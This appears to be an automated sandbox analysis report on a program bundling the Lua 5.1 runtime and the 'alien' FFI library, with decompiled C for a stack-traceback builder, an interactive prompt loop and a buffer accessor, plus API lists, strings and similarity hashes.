Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$lua_tonumber.$L_error.lua_tointeger.lua_tolstring.lua_touserdata.$lua_call.lua_isstring.lua_isuserdata.lua_pushlightuserdata.lua_pushnil.lua_pushstring.lua_rawgeti.
String ID: alien: unknown parameter type in callback$alien: unknown return type in callback
API String ID: 1198872500-1004861861
Opcode ID: 818d7718f8d59c016bf29bb4bda1fc8d45112e54d2f7af4b2bd525e22a71d6c3
Instruction ID: 1a25b96d2a059c91c19719a12ba1b54222dadcdfd87dc1e6e793110a98e6d358
Opcode Fuzzy Hash: 818d7718f8d59c016bf29bb4bda1fc8d45112e54d2f7af4b2bd525e22a71d6c3
Instruction Fuzzy Hash: 31D1C432A082509BCB10EF5DFA8186AB7F4FF86321F544A7DF8568B790D635E810CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10011CF0, Relevance: 58.0, APIs: 25, Strings: 8, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E10011CF0(void* __eflags, void* __fp0) {
				void* _t26;
				void* _t29;
				signed int _t30;
				void* _t35;
				signed int _t43;
				intOrPtr _t45;
				void* _t51;
				void* _t52;
				signed int _t55;
				signed int _t56;
				void* _t63;
				void* _t79;
				void* _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t92;

				_t81 =  *((intOrPtr*)(_t84 + 0x74));
				_t79 = 1;
				_t63 = E10011630(__eflags, _t81, _t84 + 0x68);
				_t26 = E10001490(__eflags, __fp0, _t81,  *((intOrPtr*)(_t84 + 0x80)) + 2);
				_t85 = _t84 + 0x10;
				_t94 = _t26;
				if(_t26 == 0) {
					__eflags = _t81 - _t63;
					_t6 = _t81 == _t63;
					__eflags = _t6;
					_t82 = 0 | _t6;
				} else {
					_t82 = E10001670(_t94, __fp0, _t81,  *((intOrPtr*)(_t85 + 0x78)) + 2);
					E10001160(_t81, 0xfffffffe);
					_t85 = _t85 + 0x10;
				}
				_t29 = E10001150(_t81);
				_t66 =  *((intOrPtr*)(_t85 + 0x7c));
				_t86 = _t85 + 4;
				if(_t29 !=  *((intOrPtr*)(_t85 + 0x7c))) {
					_t30 = E100014D0(__eflags, _t81, _t66 + 1);
					_t86 = _t86 + 8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(1);
						_push("\n");
						goto L7;
					}
				} else {
					_push(0);
					_push(0x1001ab10);
					L7:
					_push(_t81);
					E10001930();
					_t87 = _t86 + 0xc;
					E10001930(_t81, "stack traceback:", 0x10);
					_t83 = _t82 + 1;
					_t35 = E10003F40(_t63, _t82, _t87 + 0x1c);
					_t88 = _t87 + 0x18;
					if(_t35 != 0) {
						do {
							if(_t83 <= 0xc || _t79 == 0) {
								E10001930(_t81, "\n\t", 2);
								E10004130(_t63, "Snl", _t88 + 0x1c);
								E100019F0(_t81, "%s:", _t88 + 0x4c);
								_t43 =  *(_t88 + 0x48);
								_t90 = _t88 + 0x24;
								__eflags = _t43;
								if(_t43 > 0) {
									E100019F0(_t81, "%d:", _t43);
									_t90 = _t90 + 0xc;
								}
								__eflags =  *((char*)( *((intOrPtr*)(_t90 + 0x18))));
								if( *((char*)( *((intOrPtr*)(_t90 + 0x18)))) == 0) {
									_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x1c))));
									__eflags = _t45 - 0x6d;
									if(_t45 != 0x6d) {
										__eflags = _t45 - 0x43;
										if(_t45 == 0x43) {
											L24:
											E10001930(_t81, " ?", 2);
											goto L25;
										} else {
											__eflags = _t45 - 0x74;
											if(_t45 == 0x74) {
												goto L24;
											} else {
												_push( *((intOrPtr*)(_t90 + 0x2c)));
												E100019F0(_t81, " in function <%s:%d>", _t90 + 0x34);
												_t91 = _t90 + 0x10;
											}
										}
									} else {
										_push(" in main chunk");
										_push(_t81);
										E100019F0();
										_t91 = _t90 + 8;
									}
								} else {
									E100019F0(_t81, " in function \'%s\'",  *((intOrPtr*)(_t90 + 0x14)));
									L25:
									_t91 = _t90 + 0xc;
								}
								__eflags = E10001150(_t81) -  *((intOrPtr*)(_t91 + 0x7c));
								E100023C0(_t81, E10001150(_t81) -  *((intOrPtr*)(_t91 + 0x7c)));
								_t92 = _t91 + 0xc;
							} else {
								_t10 = _t83 + 0xa; // 0xa
								_t80 = _t10;
								_t52 = E10003F40(_t63, _t80, _t88 + 0x10);
								_t92 = _t88 + 0xc;
								if(_t52 != 0) {
									E10001930(_t81, "\n\t...", 5);
									_t55 = E10003F40(_t63, _t80, _t92 + 0x1c);
									_t92 = _t92 + 0x18;
									__eflags = _t55;
									if(_t55 != 0) {
										do {
											_t83 = _t83 + 1;
											_t80 = _t80 + 1;
											_t56 = E10003F40(_t63, _t80, _t92 + 0x10);
											_t92 = _t92 + 0xc;
											__eflags = _t56;
										} while (_t56 != 0);
									}
									_t79 = 0;
								} else {
									_t83 = _t83 - 1;
									_t79 = 0;
								}
							}
							_t83 = _t83 + 1;
							_t51 = E10003F40(_t63, _t83, _t92 + 0x10);
							_t88 = _t92 + 0xc;
						} while (_t51 != 0);
					}
					E100023C0(_t81, E10001150(_t81) -  *((intOrPtr*)(_t88 + 0x7c)));
				}
				return 1;
			}

0x10011cfa
0x10011d01
0x10011d12
0x10011d19
0x10011d1e
0x10011d21
0x10011d23
0x10011d44
0x10011d46
0x10011d46
0x10011d49
0x10011d25
0x10011d36
0x10011d38
0x10011d3d
0x10011d3d
0x10011d4c
0x10011d51
0x10011d55
0x10011d5a
0x10011d68
0x10011d6d
0x10011d70
0x10011d72
0x10011d78
0x10011d7a
0x00000000
0x10011d7a
0x10011d5c
0x10011d5c
0x10011d5e
0x10011d7f
0x10011d7f
0x10011d80
0x10011d85
0x10011d90
0x10011d9e
0x10011d9f
0x10011da4
0x10011da9
0x10011daf
0x10011db2
0x10011e1a
0x10011e2a
0x10011e3a
0x10011e3f
0x10011e43
0x10011e46
0x10011e48
0x10011e51
0x10011e56
0x10011e56
0x10011e5d
0x10011e60
0x10011e78
0x10011e7a
0x10011e7c
0x10011e8e
0x10011e90
0x10011eb0
0x10011eb8
0x00000000
0x10011e92
0x10011e92
0x10011e94
0x00000000
0x10011e96
0x10011e9e
0x10011ea6
0x10011eab
0x10011eab
0x10011e94
0x10011e7e
0x10011e7e
0x10011e83
0x10011e84
0x10011e89
0x10011e89
0x10011e62
0x10011e6d
0x10011ebd
0x10011ebd
0x10011ebd
0x10011ec6
0x10011ecc
0x10011ed1
0x10011db8
0x10011dbc
0x10011dbc
0x10011dc2
0x10011dc7
0x10011dcc
0x10011dde
0x10011dea
0x10011def
0x10011df2
0x10011df4
0x10011df6
0x10011df6
0x10011dfb
0x10011dff
0x10011e04
0x10011e07
0x10011e07
0x10011df6
0x10011e0b
0x10011dce
0x10011dce
0x10011dcf
0x10011dcf
0x10011dcc
0x10011edd
0x10011ede
0x10011ee3
0x10011ee6
0x10011daf
0x10011efa
0x10011eff
0x10011f0e

APIs

Part of subcall function 10011630: lua_type.LUA5.1(?,00000001,?,100113D5,?,?), ref: 10011638
Part of subcall function 10011630: lua_tothread.LUA5.1(?,00000001), ref: 10011652

lua_isnumber.LUA5.1(?,?,?,?), ref: 10011D19
lua_tointeger.LUA5.1(?,?), ref: 10011D2E
lua_settop.LUA5.1(?,000000FE,?,?), ref: 10011D38
lua_gettop.LUA5.1(?), ref: 10011D4C
lua_isstring.LUA5.1(?,?), ref: 10011D68

Part of subcall function 100014D0: lua_type.LUA5.1(?,?), ref: 100014DA

lua_pushlstring.LUA5.1(?,10019B78,00000001), ref: 10011D80
lua_pushlstring.LUA5.1(?,stack traceback:,00000010), ref: 10011D90
lua_getstack.LUA5.1(00000000,00000000,?,?,stack traceback:,00000010), ref: 10011D9F
lua_getstack.LUA5.1(00000000,0000000A,?), ref: 10011DC2
lua_pushlstring.LUA5.1(?,...,00000005), ref: 10011DDE

Part of subcall function 10001930: luaS_newlstr.LUA5.1(?,?,?), ref: 1000195A

lua_getstack.LUA5.1(00000000,0000000A,?,?,...,00000005), ref: 10011DEA
lua_getstack.LUA5.1(00000000,0000000B,?), ref: 10011DFF
lua_pushlstring.LUA5.1(?,1001A18C,00000002), ref: 10011E1A
lua_getinfo.LUA5.1(00000000,Snl,?,?,1001A18C,00000002), ref: 10011E2A
lua_pushfstring.LUA5.1(?,%s:,?,00000000,Snl,?,?,1001A18C,00000002), ref: 10011E3A
lua_pushfstring.LUA5.1(?,%d:,?), ref: 10011E51
lua_pushfstring.LUA5.1(?, in function '%s',?), ref: 10011E6D
lua_pushfstring.LUA5.1(?, in main chunk), ref: 10011E84
lua_pushfstring.LUA5.1(?, in function <%s:%d>,?,?), ref: 10011EA6
lua_gettop.LUA5.1(?), ref: 10011EC1
lua_concat.LUA5.1(?,?,?), ref: 10011ECC
lua_getstack.LUA5.1(00000000,00000000,?), ref: 10011EDE
lua_gettop.LUA5.1(?), ref: 10011EEF
lua_concat.LUA5.1(?,?,?), ref: 10011EFA

Strings

..., xrefs: 10011DD8
%s:, xrefs: 10011E34
in main chunk, xrefs: 10011E7E
in function '%s', xrefs: 10011E67
stack traceback:, xrefs: 10011D8A
%d:, xrefs: 10011E4B
in function <%s:%d>, xrefs: 10011EA0
Snl, xrefs: 10011E24

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_getstack.lua_pushfstring.$lua_pushlstring.$lua_gettop.$lua_concat.lua_type.$S_newlstr.lua_getinfo.lua_isnumber.lua_isstring.lua_settop.lua_tointeger.lua_tothread.
String ID: ...$ in function '%s'$ in function <%s:%d>$ in main chunk$%d:$%s:$Snl$stack traceback:
API String ID: 1649200058-3960880903
Opcode ID: 2f01da7c8fe38133d401210fd4cce6ff0922a908cf09679d7e768bbd5650decd
Instruction ID: b9ae0ff462a2422627092352f1d535dbb1980089d9f59c4c48a4b9fa55214fc6
Opcode Fuzzy Hash: 2f01da7c8fe38133d401210fd4cce6ff0922a908cf09679d7e768bbd5650decd
Instruction Fuzzy Hash: E051E6B95046013AF219D6609C42EFF32DDDF822C8F044528FE559A147FB75FA8682B7

Uniqueness

Uniqueness Score: -1.00%

Function 004015B0, Relevance: 43.9, APIs: 21, Strings: 4, Instructions: 138
stringCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E004015B0(void* __ecx, char* __edx, void* __edi, void* __esi, void* __ebp, void* __eflags) {
				signed int _v4;
				char _v516;
				void* _v520;
				void* __ebx;
				signed int _t18;
				char* _t21;
				char* _t22;
				struct _IO_FILE* _t29;
				signed int _t30;
				intOrPtr* _t31;
				void* _t32;
				char* _t33;
				void* _t36;
				char _t41;
				signed int _t46;
				void* _t47;
				void* _t49;
				char* _t51;
				intOrPtr* _t53;
				signed int _t55;
				signed int _t56;
				void* _t59;
				signed int _t60;
				void* _t61;

				_t44 = __edx;
				_t55 =  &_v520;
				_v4 =  *0x404000 ^ _t55;
				_t36 = __ecx;
				_push(0);
				_push(__ecx);
				L00401F0C();
				_t18 = E00401480(__ecx, __edx, __ebp, 1);
				_t56 = _t55 + 0xc;
				if(_t18 != 0) {
					_push(__ebp);
					_t53 = __imp____iob_func;
					_push(__esi);
					_push(__edi);
					while(1) {
						_push("=stdin");
						_push(1);
						_push(_t36);
						L00401F72();
						_push(_t18);
						_push(0);
						_push(1);
						_push(_t36);
						L00401F36();
						_push(_t18);
						_push(_t36);
						L00401F1E();
						_t46 = _t18;
						_t59 = _t56 + 0x24;
						if(_t46 != 3) {
							break;
						}
						_t21 =  &_v520;
						_push(_t21);
						_push(0xffffffff);
						_push(_t36);
						L00401F36();
						_t22 = strstr(_t21, "\'<eof>\'");
						_t59 = _t59 + 0x14;
						if(_t22 != _v520 + _t21 - 7) {
							break;
						} else {
							_push(0xfffffffe);
							_push(_t36);
							L00401F0C();
							_push("_PROMPT2");
							_push(0xffffd8ee);
							_push(_t36);
							L00401EE2();
							_push(0);
							_push(0xffffffff);
							_push(_t36);
							L00401F36();
							_t51 = _t22;
							_t61 = _t59 + 0x20;
							if(_t51 == 0) {
								_t51 = ">> ";
							}
							L00401F0C();
							fputs(_t51,  *_t53(_t36, 0xfffffffe) + 0x20);
							fflush( *_t53() + 0x20);
							_t29 =  *_t53();
							_t44 =  &_v516;
							_t30 = fgets( &_v516, 0x200, _t29);
							_t60 = _t61 + 0x20;
							if(_t30 == 0) {
								_t19 = _t30 | 0xffffffff;
							} else {
								_t31 =  &_v516;
								_t44 = _t31 + 1;
								do {
									_t41 =  *_t31;
									_t31 = _t31 + 1;
								} while (_t41 != 0);
								_t32 = _t31 - _t44;
								if(_t32 != 0) {
									_t33 = _t60 + _t32 + 0x13;
									if( *((char*)(_t60 + _t32 + 0x13)) == 0xa) {
										 *_t33 = _t41;
									}
								}
								_t18 =  &_v516;
								_push(_t18);
								_push(_t36);
								L00401ED0();
								_push(1);
								_push("\n");
								_push(_t36);
								L00401F12();
								_push(0xfffffffe);
								_push(_t36);
								L00401F06();
								_push(3);
								_push(_t36);
								L00401EFA();
								_t56 = _t60 + 0x24;
								continue;
							}
						}
						L16:
						_pop(_t47);
						_pop(_t49);
						return E00401F90(_t19, _t36, _v4 ^ _t60, _t44, _t47, _t49);
						goto L17;
					}
					_push(1);
					_push(_t36);
					L00401F7E();
					_t60 = _t59 + 8;
					_t19 = _t46;
					goto L16;
				} else {
					return E00401F90(_t18 | 0xffffffff, _t36, _v4 ^ _t56, __edx, __edi, __esi);
				}
				L17:
			}

0x004015b0
0x004015b0
0x004015bd
0x004015c5
0x004015c7
0x004015c9
0x004015ca
0x004015d1
0x004015d6
0x004015db
0x004015f6
0x004015f7
0x004015fd
0x004015fe
0x00401600
0x00401600
0x00401605
0x00401607
0x00401608
0x00401610
0x00401611
0x00401613
0x00401615
0x00401616
0x0040161e
0x0040161f
0x00401620
0x00401625
0x00401627
0x0040162d
0x00000000
0x00000000
0x00401633
0x00401637
0x00401638
0x0040163a
0x0040163b
0x0040164e
0x00401654
0x00401659
0x00000000
0x0040165f
0x0040165f
0x00401661
0x00401662
0x00401667
0x0040166c
0x00401671
0x00401672
0x00401677
0x00401679
0x0040167b
0x0040167c
0x00401681
0x00401683
0x00401688
0x0040168a
0x0040168a
0x00401692
0x0040169e
0x004016aa
0x004016b0
0x004016b3
0x004016bd
0x004016c3
0x004016c8
0x0040172a
0x004016ca
0x004016ca
0x004016ce
0x004016d1
0x004016d1
0x004016d3
0x004016d6
0x004016da
0x004016dc
0x004016e3
0x004016e7
0x004016e9
0x004016e9
0x004016e7
0x004016eb
0x004016ef
0x004016f0
0x004016f1
0x004016f6
0x004016f8
0x004016fd
0x004016fe
0x00401703
0x00401705
0x00401706
0x0040170b
0x0040170d
0x0040170e
0x00401713
0x00000000
0x00401713
0x004016c8
0x0040172d
0x00401734
0x00401735
0x00401745
0x00000000
0x00401745
0x0040171b
0x0040171d
0x0040171e
0x00401723
0x00401726
0x00000000
0x004015dd
0x004015f5
0x004015f5
0x00000000

APIs

lua_settop.LUA5.1(?,00000000), ref: 004015CA

Part of subcall function 00401480: lua_getfield.LUA5.1(?,FFFFD8EE,_PROMPT), ref: 004014B3
Part of subcall function 00401480: lua_tolstring.LUA5.1(?,000000FF,00000000,?,FFFFD8EE,_PROMPT), ref: 004014BD
Part of subcall function 00401480: lua_settop.LUA5.1(?,000000FE), ref: 004014DC
Part of subcall function 00401480: __iob_func.MSVCR80 ref: 004014E7
Part of subcall function 00401480: fputs.MSVCR80 ref: 004014EE
Part of subcall function 00401480: __iob_func.MSVCR80 ref: 004014F4
Part of subcall function 00401480: fflush.MSVCR80 ref: 004014FA
Part of subcall function 00401480: __iob_func.MSVCR80 ref: 00401500
Part of subcall function 00401480: fgets.MSVCR80 ref: 0040150D

lua_objlen.LUA5.1(?,00000001,=stdin), ref: 00401608
lua_tolstring.LUA5.1(?,00000001,00000000,00000000), ref: 00401616
luaL_loadbuffer.LUA5.1(?,00000000,?,?,00000000), ref: 00401620
lua_tolstring.LUA5.1(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 0040163B
strstr.MSVCR80 ref: 0040164E
lua_settop.LUA5.1(?,000000FE,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401662
lua_getfield.LUA5.1(?,FFFFD8EE,_PROMPT2,?,000000FE), ref: 00401672
lua_tolstring.LUA5.1(?,000000FF,00000000,?,FFFFD8EE,_PROMPT2,?,000000FE), ref: 0040167C
lua_settop.LUA5.1(?,000000FE), ref: 00401692
__iob_func.MSVCR80 ref: 00401697
fputs.MSVCR80 ref: 0040169E
__iob_func.MSVCR80 ref: 004016A4
fflush.MSVCR80 ref: 004016AA
__iob_func.MSVCR80 ref: 004016B0
fgets.MSVCR80 ref: 004016BD
lua_pushstring.LUA5.1(?,?), ref: 004016F1
lua_pushlstring.LUA5.1(?,004033A8,00000001,?,?), ref: 004016FE
lua_insert.LUA5.1(?,000000FE,?,004033A8,00000001,?,?), ref: 00401706
lua_concat.LUA5.1(?,00000003,?,000000FE,?,004033A8,00000001,?,?), ref: 0040170E

Strings

_PROMPT2, xrefs: 00401667
=stdin, xrefs: 00401600
'<eof>', xrefs: 00401644
>> , xrefs: 0040168A, 0040169D

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: __iob_func$lua_settop.lua_tolstring.$fflushfgetsfputslua_getfield.$L_loadbuffer.lua_concat.lua_insert.lua_objlen.lua_pushlstring.lua_pushstring.strstr
String ID: '<eof>'$=stdin$>> $_PROMPT2
API String ID: 3843576080-31817815
Opcode ID: a5aca4812416eb5336edb13f833457da7b205ab0c483a8bfb940774393995cc1
Instruction ID: fdc9eebb29f5bdfe787f637e43b1435b517b5b7b87b5eeef3a97a82aab6878cd
Opcode Fuzzy Hash: a5aca4812416eb5336edb13f833457da7b205ab0c483a8bfb940774393995cc1
Instruction Fuzzy Hash: 914146716043023BD6207B359D87F6F368D4B41329F140B3BF926B62E3EA7D9A04426E

Uniqueness

Uniqueness Score: -1.00%

Function 00A23B40, Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 224
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00A23B40(long long __fp0, intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				signed short __esi;
				void* _t23;
				signed int _t24;
				signed int _t25;
				signed int _t32;
				void* _t39;
				intOrPtr _t44;
				signed int _t48;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t57;
				long long _t65;

				_t65 = __fp0;
				_t44 = _a4;
				_t24 = E00A21110(_t23, 1, _t44, "alien_buffer");
				_t32 = _t24;
				_t51 = (_t48 & 0xffffffc0) - 0x34 + 4;
				if(_t32 == 0) {
					_push("alien buffer expected");
					_push(1);
					_push(_t44);
					L00A23F14();
					_t51 = _t51 + 0xc;
				}
				_push(2);
				_push(_t44);
				L00A23F4A();
				_t52 = _t51 + 8;
				if(_t24 != 4) {
					_push(2);
					_push(_t44);
					L00A23FCE();
					_push(0xa25558);
					_push("char");
					_push(3);
					_push(_t44);
					_t39 = _t24 - 1;
					L00A23F98();
					_t25 =  *(0xa25510 + _t24 * 4);
					_t53 = _t52 + 0x18;
					if(_t25 > 0x11) {
						L28:
						_push("alien: unknown type in buffer:get");
						_push(_t44);
						L00A23F26();
						goto L29;
					} else {
						switch( *((intOrPtr*)(_t25 * 4 +  &M00A23D84))) {
							case 0:
								_v8 =  *((short*)(_t32 + _t39));
								asm("fild dword [esp+0x44]");
								 *((long long*)(_t53 - 8)) = _t65;
								_push(_t44);
								L00A23F80();
								return 1;
								goto L30;
							case 1:
								_v8 =  *(__ebx + __edi) & 0x0000ffff;
								__esp = __esp - 8;
								asm("fild dword [esp+0x44]");
								 *__esp = __fp0;
								_push(__esi);
								L00A23F80();
								__esp =  &(__esp[6]);
								__eax = 1;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return 1;
								goto L30;
							case 2:
								asm("fild dword [ebx+edi]");
								__esp = __esp - 8;
								 *__esp = __fp0;
								_push(__esi);
								L00A23F80();
								__esp =  &(__esp[6]);
								__eax = 1;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return 1;
								goto L30;
							case 3:
								__eax =  *(__ebx + __edi);
								__eflags =  *(__ebx + __edi);
								goto L13;
							case 4:
								__eflags =  *(__ebx + __edi);
								L13:
								asm("fild dword [ebx+edi]");
								if(__eflags < 0) {
									__fp0 = __fp0 +  *0xa25878;
								}
								goto L15;
							case 5:
								goto L28;
							case 6:
								__fp0 =  *(__ebx + __edi);
								goto L15;
							case 7:
								__fp0 =  *(__ebx + __edi);
								goto L15;
							case 8:
								__eax =  *(__ebx + __edi);
								_v8 =  *(__ebx + __edi);
								asm("fild dword [esp+0x3c]");
								goto L15;
							case 9:
								_v8 =  *(__ebx + __edi);
								asm("fild dword [esp+0x3c]");
								L15:
								__esp = __esp - 8;
								 *__esp = __fp0;
								_push(__esi);
								L00A23F80();
								__esp =  &(__esp[6]);
								__eax = 1;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return 1;
								goto L30;
							case 0xa:
								__edi =  *(__ebx + __edi);
								__eflags = __edi;
								if(__edi == 0) {
									goto L23;
								} else {
									_push(__edi);
									_push(__esi);
									L00A23EF0();
									__esp =  &(__esp[4]);
									__eax = 1;
									_pop(__edi);
									_pop(__esi);
									_pop(__ebx);
									return 1;
								}
								goto L30;
							case 0xb:
								__edi =  *(__ebx + __edi);
								__eflags = __edi;
								if(__edi == 0) {
									goto L23;
								} else {
									_push(__edi);
									_push(__esi);
									L00A23F7A();
									__esp =  &(__esp[4]);
									__eax = 1;
									_pop(__edi);
									_pop(__esi);
									_pop(__ebx);
									return 1;
								}
								goto L30;
							case 0xc:
								__edi =  *(__ebx + __edi);
								__eflags = __edi;
								if(__edi == 0) {
									L23:
									_push(__esi);
									L00A23F74();
									__esp =  &(__esp[2]);
									__eax = 1;
									_pop(__edi);
									_pop(__esi);
									_pop(__ebx);
									return 1;
								} else {
									__edi = __esi;
									__eax = 1;
									_pop(__edi);
									_pop(__esi);
									_pop(__ebx);
									return 1;
								}
								goto L30;
						}
					}
				} else {
					_push(1);
					_push(_t44);
					L00A23FF8();
					_push(0xffffffff);
					_push(_t44);
					L00A23F4A();
					_t57 = _t52 + 0x10;
					if(_t24 != 0) {
						_push(0);
						_push(2);
						_push(_t44);
						L00A23F5C();
						_push(_t24);
						_push(0xffffffff);
						_push(_t44);
						L00A23F02();
						_t57 = _t57 + 0x18;
					}
					_push(0xffffffff);
					_push(_t44);
					L00A23F4A();
					if(_t24 != 0) {
						L29:
						return 1;
					} else {
						_push(_t24);
						_push(0xa254f4);
						_push("tostring");
						_push(2);
						_push(_t44);
						L00A23F98();
						_push( *((intOrPtr*)(0xa27048 + _t24 * 4)));
						_push(_t44);
						L00A23FE0();
						return 1;
					}
				}
				L30:
			}

0x00a23b40
0x00a23b4b
0x00a23b59
0x00a23b5e
0x00a23b60
0x00a23b65
0x00a23b67
0x00a23b6c
0x00a23b6e
0x00a23b6f
0x00a23b74
0x00a23b74
0x00a23b77
0x00a23b79
0x00a23b7a
0x00a23b7f
0x00a23b85
0x00a23bfa
0x00a23bfc
0x00a23bfd
0x00a23c02
0x00a23c07
0x00a23c0e
0x00a23c10
0x00a23c11
0x00a23c14
0x00a23c19
0x00a23c20
0x00a23c26
0x00a23d68
0x00a23d68
0x00a23d6d
0x00a23d6e
0x00000000
0x00a23c2c
0x00a23c2c
0x00000000
0x00a23c37
0x00a23c3e
0x00a23c42
0x00a23c45
0x00a23c46
0x00a23c59
0x00000000
0x00000000
0x00a23c7c
0x00a23c80
0x00a23c83
0x00a23c87
0x00a23c8a
0x00a23c8b
0x00a23c90
0x00a23c93
0x00a23c98
0x00a23c99
0x00a23c9a
0x00a23c9e
0x00000000
0x00000000
0x00a23c5a
0x00a23c5d
0x00a23c60
0x00a23c63
0x00a23c64
0x00a23c69
0x00a23c6c
0x00a23c71
0x00a23c72
0x00a23c73
0x00a23c77
0x00000000
0x00000000
0x00a23c9f
0x00a23ca2
0x00000000
0x00000000
0x00a23ccd
0x00a23ca4
0x00a23ca4
0x00a23ca7
0x00a23ca9
0x00a23ca9
0x00000000
0x00000000
0x00000000
0x00000000
0x00a23ced
0x00000000
0x00000000
0x00a23cf2
0x00000000
0x00000000
0x00a23cdf
0x00a23ce3
0x00a23ce7
0x00000000
0x00000000
0x00a23cd5
0x00a23cd9
0x00a23caf
0x00a23caf
0x00a23cb2
0x00a23cb5
0x00a23cb6
0x00a23cbb
0x00a23cbe
0x00a23cc3
0x00a23cc4
0x00a23cc5
0x00a23cc9
0x00000000
0x00000000
0x00a23cf7
0x00a23cfa
0x00a23cfc
0x00000000
0x00a23cfe
0x00a23cfe
0x00a23cff
0x00a23d00
0x00a23d05
0x00a23d08
0x00a23d0d
0x00a23d0e
0x00a23d0f
0x00a23d13
0x00a23d13
0x00000000
0x00000000
0x00a23d4b
0x00a23d4e
0x00a23d50
0x00000000
0x00a23d52
0x00a23d52
0x00a23d53
0x00a23d54
0x00a23d59
0x00a23d5c
0x00a23d61
0x00a23d62
0x00a23d63
0x00a23d67
0x00a23d67
0x00000000
0x00000000
0x00a23d29
0x00a23d2c
0x00a23d2e
0x00a23d14
0x00a23d14
0x00a23d15
0x00a23d1a
0x00a23d1d
0x00a23d22
0x00a23d23
0x00a23d24
0x00a23d28
0x00a23d30
0x00a23d35
0x00a23d3f
0x00a23d44
0x00a23d45
0x00a23d46
0x00a23d4a
0x00a23d4a
0x00000000
0x00000000
0x00a23c2c
0x00a23b87
0x00a23b87
0x00a23b89
0x00a23b8a
0x00a23b8f
0x00a23b91
0x00a23b92
0x00a23b97
0x00a23b9c
0x00a23b9e
0x00a23ba0
0x00a23ba2
0x00a23ba3
0x00a23ba8
0x00a23ba9
0x00a23bab
0x00a23bac
0x00a23bb1
0x00a23bb1
0x00a23bb4
0x00a23bb6
0x00a23bb7
0x00a23bc1
0x00a23d76
0x00a23d81
0x00a23bc7
0x00a23bc7
0x00a23bc8
0x00a23bcd
0x00a23bd2
0x00a23bd4
0x00a23bd5
0x00a23be4
0x00a23be5
0x00a23be6
0x00a23bf9
0x00a23bf9
0x00a23bc1
0x00000000

APIs

Part of subcall function 00A21110: lua_touserdata.LUA5.1(?,00000001,?,00A22DF6,alien_buffer), ref: 00A21113
Part of subcall function 00A21110: lua_getmetatable.LUA5.1(?,00000001), ref: 00A21123
Part of subcall function 00A21110: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00A2113A
Part of subcall function 00A21110: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 00A21144
Part of subcall function 00A21110: lua_settop.LUA5.1(?,000000FD), ref: 00A21153

luaL_argerror.LUA5.1(?,00000001,alien buffer expected), ref: 00A23B6F
lua_type.LUA5.1(?,00000002), ref: 00A23B7A
lua_getfenv.LUA5.1(?,00000001), ref: 00A23B8A
lua_type.LUA5.1(?,000000FF,?,00000001), ref: 00A23B92
lua_tolstring.LUA5.1(?,00000002,00000000), ref: 00A23BA3
lua_getfield.LUA5.1(?,000000FF,00000000,?,00000002,00000000), ref: 00A23BAC
lua_type.LUA5.1(?,000000FF), ref: 00A23BB7
luaL_checkoption.LUA5.1(?,00000002,tostring,00A254F4,00000000), ref: 00A23BD5
lua_pushcclosure.LUA5.1(?,00000000,?,?,?,00000000), ref: 00A23BE6
luaL_checkinteger.LUA5.1(?,00000002), ref: 00A23BFD
luaL_checkoption.LUA5.1(?,00000003,char,00A25558,?,00000002), ref: 00A23C14
lua_pushnumber.LUA5.1(?), ref: 00A23C46
lua_pushnumber.LUA5.1 ref: 00A23C64
lua_pushnumber.LUA5.1 ref: 00A23C8B
lua_pushnumber.LUA5.1 ref: 00A23CB6
lua_pushstring.LUA5.1 ref: 00A23D00
lua_pushnil.LUA5.1 ref: 00A23D15
lua_pushlightuserdata.LUA5.1 ref: 00A23D54
luaL_error.LUA5.1(?,alien: unknown type in buffer:get), ref: 00A23D6E

Strings

alien_buffer, xrefs: 00A23B4F
alien: unknown type in buffer:get, xrefs: 00A23D68
alien buffer expected, xrefs: 00A23B67
char, xrefs: 00A23C07
tostring, xrefs: 00A23BCD

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

